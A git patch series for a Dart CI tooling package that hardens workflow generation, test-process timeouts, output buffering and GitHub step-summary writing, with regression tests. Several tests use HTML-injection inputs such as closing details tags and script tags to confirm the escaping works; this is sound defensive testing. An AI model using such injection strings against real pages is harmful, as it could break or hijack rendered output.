gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + final parsed = loadYaml(rendered) as YamlMap; + final jobs = parsed['jobs'] as YamlMap; + expect(jobs.containsKey('pre-check'), isTrue); + expect(jobs.containsKey('analyze-and-test'), isTrue); + expect(jobs.containsKey('auto-format'), isFalse); + expect(jobs.containsKey('web-test'), isFalse); + // Should NOT contain feature-gated content + expect(rendered, isNot(contains('Install protoc'))); + expect(rendered, isNot(contains('lfs: true'))); + expect(rendered, isNot(contains('auto-format'))); + expect(rendered, isNot(contains('Run build_runner'))); + }); + + 
test('sub_packages render in single-platform job', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig() + ..['sub_packages'] = [ + {'name': 'core', 'path': 'packages/core'}, + {'name': 'api', 'path': 'packages/api'}, + ], + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + expect(rendered, contains('Analyze (core)')); + expect(rendered, contains('Analyze (api)')); + expect(rendered, contains('working-directory: packages/core')); + expect(rendered, contains('working-directory: packages/api')); + }); + + test('runner_overrides change runs-on in single-platform', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig()..['runner_overrides'] = {'ubuntu': 'my-custom-runner'}, + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + final parsed = loadYaml(rendered) as YamlMap; + final job = parsed['jobs']['analyze-and-test'] as YamlMap; + expect(job['runs-on'], equals('my-custom-runner')); + }); }); }); } From cf410deb645f73338743b5629682d872430309b6 Mon Sep 17 00:00:00 2001 From: Tsavo Knott Date: Tue, 24 Feb 2026 21:13:45 -0500 Subject: [PATCH 11/16] fix: harden CI workflow generation and test execution paths This addresses the consolidated review findings by improving process/stream robustness, summary safety and parsing limits, and workflow template correctness across platform dependencies, artifact policy, and cache paths. It also adds focused regression tests for test-command behavior, summary edge cases, and workflow rendering contracts. 
--- .github/workflows/ci.yaml | 11 +- .github/workflows/issue-triage.yaml | 2 +- .github/workflows/release.yaml | 16 +- .runtime_ci/template_versions.json | 20 +- bin/manage_cicd.dart | 3 +- lib/src/cli/commands/test_command.dart | 303 +++++- lib/src/cli/manage_cicd.dart | 4 +- lib/src/cli/utils/exit_util.dart | 13 + lib/src/cli/utils/step_summary.dart | 18 +- lib/src/cli/utils/test_results_util.dart | 95 +- lib/src/cli/utils/workflow_generator.dart | 4 + templates/github/workflows/ci.skeleton.yaml | 32 +- .../workflows/issue-triage.template.yaml | 2 +- .../github/workflows/release.template.yaml | 16 +- test/cli_utils_test.dart | 347 ++++--- test/test_command_test.dart | 97 ++ test/workflow_generator_test.dart | 957 +++++++----------- 17 files changed, 1102 insertions(+), 838 deletions(-) create mode 100644 lib/src/cli/utils/exit_util.dart create mode 100644 test/test_command_test.dart diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index b32b0e0..debb562 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -1,5 +1,6 @@ # Generated by runtime_ci_tooling v0.14.0 # Configured via .runtime_ci/config.json — run 'dart run runtime_ci_tooling:manage_cicd update --workflows' to regenerate. +# Policy: test artifact retention-days = 7 (applied consistently). name: CI on: @@ -106,10 +107,11 @@ jobs: sdk: "3.9.2" # ── shared:pub-cache ── keep in sync with single_platform ── + # Windows: %LOCALAPPDATA%\Pub\Cache (Dart default). Unix: ~/.pub-cache - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ~/.pub-cache + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-${{ runner.arch }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-${{ runner.arch }}-dart-pub- @@ -167,10 +169,11 @@ jobs: sdk: "3.9.2" # ── shared:pub-cache ── keep in sync with single_platform ── + # Windows: %LOCALAPPDATA%\Pub\Cache (Dart default). 
Unix: ~/.pub-cache - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ~/.pub-cache + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-${{ runner.arch }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-${{ runner.arch }}-dart-pub- @@ -198,7 +201,7 @@ jobs: PLATFORM_ID: ${{ matrix.platform_id }} - name: Upload test logs - if: always() + if: success() || failure() uses: actions/upload-artifact@v4 with: name: test-logs-${{ matrix.platform_id }} @@ -206,7 +209,7 @@ jobs: ${{ runner.temp }}/test-logs/ test/integration/fixtures/bin/ **/test-results/ - retention-days: 14 + retention-days: 7 # --- BEGIN USER: post-test --- # --- END USER: post-test --- diff --git a/.github/workflows/issue-triage.yaml b/.github/workflows/issue-triage.yaml index 3924e03..f632fc7 100644 --- a/.github/workflows/issue-triage.yaml +++ b/.github/workflows/issue-triage.yaml @@ -67,7 +67,7 @@ jobs: if: steps.trigger.outputs.run == 'true' uses: actions/cache@v5.0.3 with: - path: ~/.pub-cache + path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- diff --git a/.github/workflows/release.yaml b/.github/workflows/release.yaml index 1f693b9..c13875b 100644 --- a/.github/workflows/release.yaml +++ b/.github/workflows/release.yaml @@ -84,7 +84,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ~/.pub-cache + path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -158,7 +158,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ~/.pub-cache + path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', 
env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -242,7 +242,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ~/.pub-cache + path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -333,7 +333,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ~/.pub-cache + path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -438,7 +438,7 @@ jobs: - name: Cache Dart pub uses: actions/cache@v5.0.3 with: - path: ~/.pub-cache + path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-pub-${{ hashFiles('**/pubspec.lock') }} restore-keys: ${{ runner.os }}-pub- @@ -538,7 +538,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ~/.pub-cache + path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -679,7 +679,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ~/.pub-cache + path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -805,7 +805,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ~/.pub-cache + path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os 
}}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- diff --git a/.runtime_ci/template_versions.json b/.runtime_ci/template_versions.json index 627b907..2e01001 100644 --- a/.runtime_ci/template_versions.json +++ b/.runtime_ci/template_versions.json @@ -1,6 +1,6 @@ { "tooling_version": "0.14.0", - "updated_at": "2026-02-25T01:44:16.353491Z", + "updated_at": "2026-02-25T02:11:44.094948Z", "templates": { "gemini_settings": { "hash": "93983f49dd2f40d2ed245271854946d8916b8f0698ed2cfaf12058305baa0b08", @@ -23,19 +23,19 @@ "updated_at": "2026-02-24T00:59:57.620091Z" }, "workflow_ci": { - "hash": "d12b15077608ffdd3b92b21c0a7df520ea38278c0816b82e5925564678e3c59f", - "consumer_hash": "20eb207d18e17e6bb84ce1b19908e8bdca2bf3a26ea8e8c00a09e94c33deb0f2", - "updated_at": "2026-02-25T01:44:16.349990Z" + "hash": "f14e900c3eb2c8ee9472627688881d197b37fb801bea00fffd42fef5a1947081", + "consumer_hash": "b6b79735284de22017f27b042964dc4f51295f36752d2a340c200a27fd1e6465", + "updated_at": "2026-02-25T02:11:44.092566Z" }, "workflow_release": { - "hash": "ed0e8fb331d9c3d8827a71d320408d5ff603dcc1449eb2f6ee20b115469e0bd9", - "consumer_hash": "ed0e8fb331d9c3d8827a71d320408d5ff603dcc1449eb2f6ee20b115469e0bd9", - "updated_at": "2026-02-25T01:44:16.352226Z" + "hash": "b60dc483cf90c271565fffeee74142973884dff0ef9bc4b6a5b93d58d099c80e", + "consumer_hash": "b60dc483cf90c271565fffeee74142973884dff0ef9bc4b6a5b93d58d099c80e", + "updated_at": "2026-02-25T02:11:44.094396Z" }, "workflow_issue_triage": { - "hash": "960012c66f7a59ac16ed89d6c7d34244ef1dd16efb6c0a66244431ad49e0f28e", - "consumer_hash": "960012c66f7a59ac16ed89d6c7d34244ef1dd16efb6c0a66244431ad49e0f28e", - "updated_at": "2026-02-25T01:44:16.353504Z" + "hash": "063f07bbe55d3770d557f87b55d7c778c4d0810e416b47039f603d76620a605b", + "consumer_hash": "063f07bbe55d3770d557f87b55d7c778c4d0810e416b47039f603d76620a605b", + "updated_at": "2026-02-25T02:11:44.094960Z" } } } diff --git a/bin/manage_cicd.dart 
b/bin/manage_cicd.dart index 4a05d3f..16ef966 100644 --- a/bin/manage_cicd.dart +++ b/bin/manage_cicd.dart @@ -1,6 +1,7 @@ import 'dart:io'; import 'package:runtime_ci_tooling/src/cli/manage_cicd_cli.dart'; +import 'package:runtime_ci_tooling/src/cli/utils/exit_util.dart'; Future main(List args) async { final cli = ManageCicdCli(); @@ -8,6 +9,6 @@ Future main(List args) async { await cli.run(args); } on UsageException catch (e) { stderr.writeln(e); - exit(64); + await exitWithCode(64); } } diff --git a/lib/src/cli/commands/test_command.dart b/lib/src/cli/commands/test_command.dart index cf13209..7c9b602 100644 --- a/lib/src/cli/commands/test_command.dart +++ b/lib/src/cli/commands/test_command.dart @@ -6,6 +6,7 @@ import 'package:args/command_runner.dart'; import 'package:path/path.dart' as p; import '../../triage/utils/config.dart'; +import '../utils/exit_util.dart'; import '../utils/logger.dart'; import '../utils/repo_utils.dart'; import '../utils/step_summary.dart'; @@ -25,6 +26,10 @@ import '../utils/sub_package_utils.dart'; /// All log files are written to `$TEST_LOG_DIR` (set by CI template) or /// `/.dart_tool/test-logs/` locally. class TestCommand extends Command { + /// Maximum bytes to buffer per stdout/stderr stream to prevent OOM. + static const int _maxLogBufferBytes = 2 * 1024 * 1024; // 2MB + /// Maximum bytes for pub get output (typically small). + static const int _maxPubGetBufferBytes = 512 * 1024; // 512KB @override final String name = 'test'; @@ -36,9 +41,14 @@ class TestCommand extends Command { final repoRoot = RepoUtils.findRepoRoot(); if (repoRoot == null) { Logger.error('Could not find ${config.repoName} repo root.'); - exit(1); + await exitWithCode(1); } + await runWithRoot(repoRoot); + } + /// Run tests with an explicit [repoRoot], preserving the contract from + /// manage_cicd when invoked as `manage_cicd test` (CWD may differ from root). 
+ static Future runWithRoot(String repoRoot) async { Logger.header('Running dart test'); const processTimeout = Duration(minutes: 45); @@ -51,10 +61,10 @@ class TestCommand extends Command { RepoUtils.ensureSafeDirectory(logDir); } on StateError catch (e) { Logger.error('$e'); - exit(1); + await exitWithCode(1); } on FileSystemException catch (e) { Logger.error('Cannot use log directory: $e'); - exit(1); + await exitWithCode(1); } Logger.info('Log directory: $logDir'); @@ -88,35 +98,76 @@ class TestCommand extends Command { final process = await Process.start(Platform.resolvedExecutable, testArgs, workingDirectory: repoRoot); // Stream stdout and stderr to console in real-time while capturing + // (byte-bounded to prevent OOM from runaway test output) final stdoutBuf = StringBuffer(); final stderrBuf = StringBuffer(); - - final stdoutSub = process.stdout.transform(utf8.decoder).listen((data) { + var stdoutBytes = 0; + var stderrBytes = 0; + var stdoutTruncated = false; + var stderrTruncated = false; + const truncationSuffix = '\n\n... (output truncated, exceeded 2MB bytes). See console.log for full output.)'; + final truncationBytes = utf8.encode(truncationSuffix).length; + + void onStdout(String data) { stdout.write(data); - stdoutBuf.write(data); - }); - final stderrSub = process.stderr.transform(utf8.decoder).listen((data) { + if (stdoutTruncated) return; + final dataBytes = utf8.encode(data).length; + if (stdoutBytes + dataBytes <= _maxLogBufferBytes) { + stdoutBuf.write(data); + stdoutBytes += dataBytes; + } else { + final remaining = _maxLogBufferBytes - stdoutBytes - truncationBytes; + if (remaining > 0) { + final bytes = utf8.encode(data); + final toTake = bytes.length > remaining ? 
remaining : bytes.length; + stdoutBuf.write(utf8.decode(bytes.take(toTake).toList(), allowMalformed: true)); + } + stdoutBuf.write(truncationSuffix); + stdoutTruncated = true; + } + } + + void onStderr(String data) { stderr.write(data); - stderrBuf.write(data); - }); + if (stderrTruncated) return; + final dataBytes = utf8.encode(data).length; + if (stderrBytes + dataBytes <= _maxLogBufferBytes) { + stderrBuf.write(data); + stderrBytes += dataBytes; + } else { + final remaining = _maxLogBufferBytes - stderrBytes - truncationBytes; + if (remaining > 0) { + final bytes = utf8.encode(data); + final toTake = bytes.length > remaining ? remaining : bytes.length; + stderrBuf.write(utf8.decode(bytes.take(toTake).toList(), allowMalformed: true)); + } + stderrBuf.write(truncationSuffix); + stderrTruncated = true; + } + } + + final stdoutSub = process.stdout.transform(Utf8Decoder(allowMalformed: true)).listen(onStdout); + final stderrSub = process.stderr.transform(Utf8Decoder(allowMalformed: true)).listen(onStderr); final stdoutDone = stdoutSub.asFuture(); final stderrDone = stderrSub.asFuture(); // Process-level timeout: kill the test process if it exceeds 45 minutes. - final exitCode = await process.exitCode.timeout( - processTimeout, - onTimeout: () { - Logger.error('Test process exceeded ${processTimeout.inMinutes}-minute timeout — killing.'); - process.kill(); // No signal arg — cross-platform safe - return -1; - }, - ); + // On Unix: SIGTERM first, await up to 5s; if still alive, SIGKILL and await. + // On Windows: single kill, then await exit. 
+ int exitCode; + try { + exitCode = await process.exitCode.timeout(processTimeout); + } on TimeoutException { + Logger.error('Test process exceeded ${processTimeout.inMinutes}-minute timeout — killing.'); + exitCode = await _killAndAwaitExit(process); + } try { await Future.wait([stdoutDone, stderrDone]).timeout(const Duration(seconds: 30)); } catch (_) { - // Process killed or streams timed out — cancel subscriptions to avoid leaks + // Process killed or streams timed out + } finally { await stdoutSub.cancel(); await stderrSub.cancel(); } @@ -176,12 +227,19 @@ class TestCommand extends Command { // Ensure dependencies are resolved (sub-packages have independent // pubspec.yaml files that the root `dart pub get` may not cover). - final pubGetResult = Process.runSync( - Platform.resolvedExecutable, - ['pub', 'get'], - workingDirectory: dir, - environment: {'GIT_LFS_SKIP_SMUDGE': '1'}, + // Use Process.start so we can kill on timeout (Process.run would hang). + const pubGetTimeout = Duration(minutes: 5); + final pubGetResult = await _runPubGetWithTimeout( + dir, + pubGetTimeout, + onTimeout: () { + Logger.error(' dart pub get timed out for $name (${pubGetTimeout.inMinutes}-minute limit)'); + }, ); + if (pubGetResult == null) { + failures.add(name); + continue; + } if (pubGetResult.exitCode != 0) { final pubGetStderr = (pubGetResult.stderr as String).trim(); if (pubGetStderr.isNotEmpty) Logger.error(pubGetStderr); @@ -190,21 +248,107 @@ class TestCommand extends Command { continue; } - final spProcess = await Process.start( - Platform.resolvedExecutable, - ['test', '--exclude-tags', 'gcp,integration'], - workingDirectory: dir, - mode: ProcessStartMode.inheritStdio, - ); + final spLogDir = p.join(logDir, name); + Directory(spLogDir).createSync(recursive: true); + final spJsonPath = p.join(spLogDir, 'results.json'); + final spExpandedPath = p.join(spLogDir, 'expanded.txt'); - final spExitCode = await spProcess.exitCode.timeout( - processTimeout, - onTimeout: () { - 
Logger.error('Test process for $name exceeded ${processTimeout.inMinutes}-minute timeout — killing.'); - spProcess.kill(); // No signal arg — cross-platform safe - return -1; - }, - ); + final spTestArgs = [ + 'test', + '--exclude-tags', + 'gcp,integration', + '--chain-stack-traces', + '--reporter', + 'expanded', + '--file-reporter', + 'json:$spJsonPath', + '--file-reporter', + 'expanded:$spExpandedPath', + ]; + + final spProcess = await Process.start(Platform.resolvedExecutable, spTestArgs, workingDirectory: dir); + + final stdoutBuf = StringBuffer(); + final stderrBuf = StringBuffer(); + var stdoutBytes = 0; + var stderrBytes = 0; + var stdoutTruncated = false; + var stderrTruncated = false; + const spTruncationSuffix = '\n\n... (output truncated, exceeded 2MB bytes). See console.log for full output.)'; + final spTruncationBytes = utf8.encode(spTruncationSuffix).length; + + void onSpStdout(String data) { + stdout.write(data); + if (stdoutTruncated) return; + final dataBytes = utf8.encode(data).length; + if (stdoutBytes + dataBytes <= _maxLogBufferBytes) { + stdoutBuf.write(data); + stdoutBytes += dataBytes; + } else { + final remaining = _maxLogBufferBytes - stdoutBytes - spTruncationBytes; + if (remaining > 0) { + final bytes = utf8.encode(data); + final toTake = bytes.length > remaining ? remaining : bytes.length; + stdoutBuf.write(utf8.decode(bytes.take(toTake).toList(), allowMalformed: true)); + } + stdoutBuf.write(spTruncationSuffix); + stdoutTruncated = true; + } + } + + void onSpStderr(String data) { + stderr.write(data); + if (stderrTruncated) return; + final dataBytes = utf8.encode(data).length; + if (stderrBytes + dataBytes <= _maxLogBufferBytes) { + stderrBuf.write(data); + stderrBytes += dataBytes; + } else { + final remaining = _maxLogBufferBytes - stderrBytes - spTruncationBytes; + if (remaining > 0) { + final bytes = utf8.encode(data); + final toTake = bytes.length > remaining ? 
remaining : bytes.length; + stderrBuf.write(utf8.decode(bytes.take(toTake).toList(), allowMalformed: true)); + } + stderrBuf.write(spTruncationSuffix); + stderrTruncated = true; + } + } + + final stdoutSub = spProcess.stdout.transform(Utf8Decoder(allowMalformed: true)).listen(onSpStdout); + final stderrSub = spProcess.stderr.transform(Utf8Decoder(allowMalformed: true)).listen(onSpStderr); + + int spExitCode; + try { + spExitCode = await spProcess.exitCode.timeout(processTimeout); + } on TimeoutException { + Logger.error('Test process for $name exceeded ${processTimeout.inMinutes}-minute timeout — killing.'); + spExitCode = await _killAndAwaitExit(spProcess); + } + + try { + await Future.wait([ + stdoutSub.asFuture(), + stderrSub.asFuture(), + ]).timeout(const Duration(seconds: 30)); + } catch (_) { + // Process killed or streams timed out + } finally { + await stdoutSub.cancel(); + await stderrSub.cancel(); + } + + try { + RepoUtils.writeFileSafely(p.join(spLogDir, 'dart_stdout.log'), stdoutBuf.toString()); + if (stderrBuf.isNotEmpty) { + RepoUtils.writeFileSafely(p.join(spLogDir, 'dart_stderr.log'), stderrBuf.toString()); + } + } on FileSystemException catch (e) { + Logger.warn('Could not write sub-package log files: $e'); + } + + final spResults = TestResultsUtil.parseTestResultsJson(spJsonPath); + TestResultsUtil.writeTestJobSummary(spResults, spExitCode, platformId: name); if (spExitCode != 0) { Logger.error('Tests failed for $name (exit code $spExitCode)'); @@ -218,9 +362,90 @@ class TestCommand extends Command { Logger.error('Tests failed for ${failures.length} package(s): ${failures.join(', ')}'); final failureBullets = failures.map((name) => '- `${StepSummary.escapeHtml(name)}`').join('\n'); StepSummary.write('\n## Sub-package Test Failures\n\n$failureBullets\n'); - exit(1); + await exitWithCode(1); } Logger.success('All tests passed'); + await stdout.flush(); + await stderr.flush(); + } + + /// Runs `dart pub get` in [workingDirectory] with [timeout]. 
Kills the process + /// on timeout to avoid indefinite hangs. Returns null on timeout. + static Future _runPubGetWithTimeout( + String workingDirectory, + Duration timeout, { + void Function()? onTimeout, + }) async { + final process = await Process.start( + Platform.resolvedExecutable, + ['pub', 'get'], + workingDirectory: workingDirectory, + environment: {'GIT_LFS_SKIP_SMUDGE': '1'}, + ); + final stdoutBuf = StringBuffer(); + final stderrBuf = StringBuffer(); + final stdoutBytes = [0]; + final stderrBytes = [0]; + final stdoutTruncated = [false]; + final stderrTruncated = [false]; + const pubGetTruncationSuffix = '\n\n... (output truncated).'; + final pubGetTruncationBytes = utf8.encode(pubGetTruncationSuffix).length; + + void capWrite(StringBuffer buf, String data, int maxBytes, List truncated, List byteCount) { + if (truncated[0]) return; + final dataBytes = utf8.encode(data).length; + if (byteCount[0] + dataBytes <= maxBytes) { + buf.write(data); + byteCount[0] += dataBytes; + } else { + final remaining = maxBytes - byteCount[0] - pubGetTruncationBytes; + if (remaining > 0) { + final bytes = utf8.encode(data); + final toTake = bytes.length > remaining ? 
remaining : bytes.length; + buf.write(utf8.decode(bytes.take(toTake).toList(), allowMalformed: true)); + } + buf.write(pubGetTruncationSuffix); + truncated[0] = true; + } + } + + final stdoutSub = process.stdout + .transform(Utf8Decoder(allowMalformed: true)) + .listen((data) => capWrite(stdoutBuf, data, _maxPubGetBufferBytes, stdoutTruncated, stdoutBytes)); + final stderrSub = process.stderr + .transform(Utf8Decoder(allowMalformed: true)) + .listen((data) => capWrite(stderrBuf, data, _maxPubGetBufferBytes, stderrTruncated, stderrBytes)); + try { + final exitCode = await process.exitCode.timeout(timeout); + await Future.wait([stdoutSub.cancel(), stderrSub.cancel()]); + return ProcessResult(process.pid, exitCode, stdoutBuf.toString(), stderrBuf.toString()); + } on TimeoutException { + onTimeout?.call(); + await _killAndAwaitExit(process); + try { + await Future.wait([stdoutSub.cancel(), stderrSub.cancel()]); + } catch (_) {} + return null; + } + } + + /// Kills [process] and awaits exit. On Unix: SIGTERM first, wait up to 5s; + /// if still alive, SIGKILL and await. On Windows: single kill, then await. + /// Returns -1 to indicate timeout-induced kill. + static Future _killAndAwaitExit(Process process) async { + if (Platform.isWindows) { + process.kill(); + await process.exitCode; + return -1; + } + process.kill(ProcessSignal.sigterm); + try { + await process.exitCode.timeout(const Duration(seconds: 5)); + } on TimeoutException { + process.kill(ProcessSignal.sigkill); + await process.exitCode; + } + return -1; } } diff --git a/lib/src/cli/manage_cicd.dart b/lib/src/cli/manage_cicd.dart index 69156f9..79dc164 100644 --- a/lib/src/cli/manage_cicd.dart +++ b/lib/src/cli/manage_cicd.dart @@ -2165,8 +2165,8 @@ ${_artifactLink()} /// /// All log files are written to [logDir] (`$TEST_LOG_DIR` in CI, or /// `/.dart_tool/test-logs/` locally). 
-Future _runTest(String _) async { - await TestCommand().run(); +Future _runTest(String repoRoot) async { + await TestCommand.runWithRoot(repoRoot); } /// Run dart analyze and fail only on actual errors. diff --git a/lib/src/cli/utils/exit_util.dart b/lib/src/cli/utils/exit_util.dart new file mode 100644 index 0000000..0a84322 --- /dev/null +++ b/lib/src/cli/utils/exit_util.dart @@ -0,0 +1,13 @@ +import 'dart:io'; + +/// Flush stdout and stderr before exiting so final messages are not lost. +/// Ignores flush errors (e.g. when running under dart test with captured streams). +Future exitWithCode(int code) async { + try { + await stdout.flush(); + } catch (_) {} + try { + await stderr.flush(); + } catch (_) {} + exit(code); +} diff --git a/lib/src/cli/utils/step_summary.dart b/lib/src/cli/utils/step_summary.dart index 747e571..38f7455 100644 --- a/lib/src/cli/utils/step_summary.dart +++ b/lib/src/cli/utils/step_summary.dart @@ -1,3 +1,4 @@ +import 'dart:convert'; import 'dart:io'; import '../../triage/utils/config.dart'; @@ -12,8 +13,10 @@ abstract final class StepSummary { /// Write a markdown summary to $GITHUB_STEP_SUMMARY (visible in Actions UI). /// No-op when running locally (env var not set). /// Skips appending if the file would exceed the 1 MiB GitHub limit. - static void write(String markdown) { - final summaryFile = Platform.environment['GITHUB_STEP_SUMMARY']; + /// [environment] overrides Platform.environment (for testing). + static void write(String markdown, {Map? environment}) { + final env = environment ?? Platform.environment; + final summaryFile = env['GITHUB_STEP_SUMMARY']; if (summaryFile == null || summaryFile.trim().isEmpty) return; if (RepoUtils.isSymlinkPath(summaryFile)) { Logger.warn('Refusing to write step summary through symlink: $summaryFile'); @@ -21,7 +24,9 @@ abstract final class StepSummary { } final file = File(summaryFile); final currentSize = file.existsSync() ? 
file.lengthSync() : 0; - if (currentSize + markdown.length > _maxSummaryBytes) { + // Use UTF-8 byte length (not markdown.length) — GitHub limit is 1 MiB. + final markdownBytes = utf8.encode(markdown).length; + if (currentSize + markdownBytes > _maxSummaryBytes) { Logger.warn('Step summary approaching 1 MiB limit — skipping append'); return; } @@ -65,11 +70,16 @@ abstract final class StepSummary { } /// Wrap content in a collapsible
block for step summaries. + /// Escapes title and content to prevent HTML injection (e.g. closing tags like + ///
) from breaking structure or executing unsafe HTML. static String collapsible(String title, String content, {bool open = false}) { if (content.trim().isEmpty) return ''; final openAttr = open ? ' open' : ''; final safeTitle = escapeHtml(title); - return '\n\n$safeTitle\n\n$content\n\n\n'; + // Escape content to prevent , , ', + stackTrace: 'fake', + printOutput: '', + durationMs: 0, ), ); - expect(summary!, isNot(contains('failing test 24'))); + + TestResultsUtil.writeTestJobSummary( + results, + 1, + platformId: 'linux', + writeSummary: (markdown) => summary = markdown, + ); + + expect(summary, isNotNull); + expect(summary!, contains('</details>')); + expect(summary!, contains('<script>')); + expect(summary!, contains('<summary>')); + expect(summary!, isNot(contains(''))); + }); + + test('handles adversarial backtick content in failure output', () { + String? summary; + final results = _parsed(passed: 0, failed: 1, skipped: 0); + results.failures.add( + TestFailure( + name: 'backtick test', + error: '```' * 10 + 'content' + '```' * 10, + stackTrace: '', + printOutput: '', + durationMs: 0, + ), + ); + + TestResultsUtil.writeTestJobSummary( + results, + 1, + platformId: 'linux', + writeSummary: (markdown) => summary = markdown, + ); + + expect(summary, isNotNull); + expect(summary!, contains('### Failed Tests')); + expect(summary!, contains('backtick test')); + // Fence should be longer than content's backticks; output should be valid + expect(summary!.split('```').length, greaterThan(2)); + }); + }); + + group('StepSummary', () { + test('write uses byte size not char size for limit guard', () { + // GitHub step summary limit is 1 MiB; guard must use UTF-8 byte count. + // Multi-byte chars (e.g. 語) have more bytes than chars — old bug used + // markdown.length (chars) and could overflow. 
+ late Directory tempDir; + tempDir = Directory.systemTemp.createTempSync('step_summary_bytes_'); + try { + final summaryPath = p.join(tempDir.path, 'summary.md'); + const maxBytes = (1024 * 1024) - (4 * 1024); + // Fill to maxBytes - 2 so that "語" (3 bytes) would exceed + File(summaryPath).writeAsStringSync('x' * (maxBytes - 2)); + expect(File(summaryPath).lengthSync(), equals(maxBytes - 2)); + + StepSummary.write('語', environment: {'GITHUB_STEP_SUMMARY': summaryPath}); + // Should skip append (would exceed); file size unchanged + expect(File(summaryPath).lengthSync(), equals(maxBytes - 2)); + } finally { + if (tempDir.existsSync()) tempDir.deleteSync(recursive: true); + } + }); + + test('collapsible escapes content to prevent HTML injection', () { + final out = StepSummary.collapsible( + 'Title', + 'Content with and ', + ); + expect(out, contains('</summary>')); + expect(out, contains('<script>')); + expect(out, contains('</details>')); + expect(out, contains('<img')); + expect(out, isNot(contains(''))); + expect(out, contains('
')); + expect(out, contains('
')); }); }); } diff --git a/test/test_command_test.dart b/test/test_command_test.dart new file mode 100644 index 0000000..9a0ab1c --- /dev/null +++ b/test/test_command_test.dart @@ -0,0 +1,97 @@ +import 'dart:io'; + +import 'package:path/path.dart' as p; +import 'package:test/test.dart'; + +import 'package:runtime_ci_tooling/src/cli/commands/test_command.dart'; +import 'package:runtime_ci_tooling/src/cli/utils/test_results_util.dart'; +import 'package:runtime_ci_tooling/src/triage/utils/config.dart'; + +void main() { + group('TestCommand.runWithRoot', () { + late Directory tempDir; + + setUp(() { + tempDir = Directory.systemTemp.createTempSync('test_command_'); + }); + + tearDown(() { + if (tempDir.existsSync()) { + tempDir.deleteSync(recursive: true); + } + }); + + test('skips root tests and succeeds when no test/ directory exists', () async { + // Minimal repo: pubspec with matching name, no test/ + File(p.join(tempDir.path, 'pubspec.yaml')).writeAsStringSync('name: ${config.repoName}\nversion: 0.0.0\n'); + + // Completes without throwing or exit(1); StepSummary.write is no-op when + // GITHUB_STEP_SUMMARY is unset (local runs). 
